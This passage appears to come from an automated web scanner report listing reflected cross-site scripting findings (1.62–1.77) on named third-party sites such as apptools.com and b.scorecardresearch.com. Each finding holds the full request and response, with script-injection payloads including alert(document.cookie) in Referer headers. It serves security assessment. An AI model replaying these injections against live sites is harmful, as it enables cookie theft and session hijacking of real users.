User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 201

Error handler problem:
Error Number: B8BUa0w7Ilp7zBNRYRdWMLni
Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

1.62. http://api.blogburst.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 19:10:36 GMT
Content-Length: 189

Error handler problem:
Error Number: B83sUW5V9btfzEZ9C74xOolh
Error Path: /favicon.ico80c92(a)e7e03c35472
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

1.63. http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryProxy.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:08 GMT
Content-Length: 205

Error handler problem:
Error Number: B80iwlBCmlTpz5Pig5CAws6o
Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

1.64. http://api.blogburst.com/v1.0/WidgetDeliveryProxyStub.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryProxyStub.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:19 GMT
Content-Length: 207

Error handler problem:
Error Number: B94M87SkpIdWCgjC0l2bFGg
Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

1.65. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:36 GMT
Content-Length: 209

Error handler problem:
Error Number: B8WJgPc8mOdez6tZwoiCJoTl
Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

1.66. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:41 GMT
Content-Length: 208

Error handler problem:
Error Number: B7fOWSgosfbjAnIBtXULjlA
Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

1.67. http://api.demandbase.com/api/v1/ip.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /api/v1/ip.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 02 Feb 2011 19:10:46 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 94

demandbase_parse5fda3<script>alert(1)</script>05613b280fe({"isp":true,"ip":"173.193.214.243"})

1.68. http://apptools.com/examples/tableheight.php. [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3788
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p>
...[SNIP]...

1.69. http://apptools.com/examples/tableheight.php. [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3789
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p>
...[SNIP]...

1.70. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3792
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p>
...[SNIP]...

1.71. http://apptools.com/styles/apptools.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/apptools.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:31 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p>
...[SNIP]...

1.72. http://apptools.com/styles/apptools.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/apptools.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p>
...[SNIP]...

1.73. http://apptools.com/styles/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/print.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:29 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p>
...[SNIP]...

1.74. http://apptools.com/styles/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/print.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p>
...[SNIP]...

1.75. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39fb5f<script>alert(1)</script>bb7775bca59", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

1.76. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338a97d8<script>alert(1)</script>9a0c4e010c5", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

1.77. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

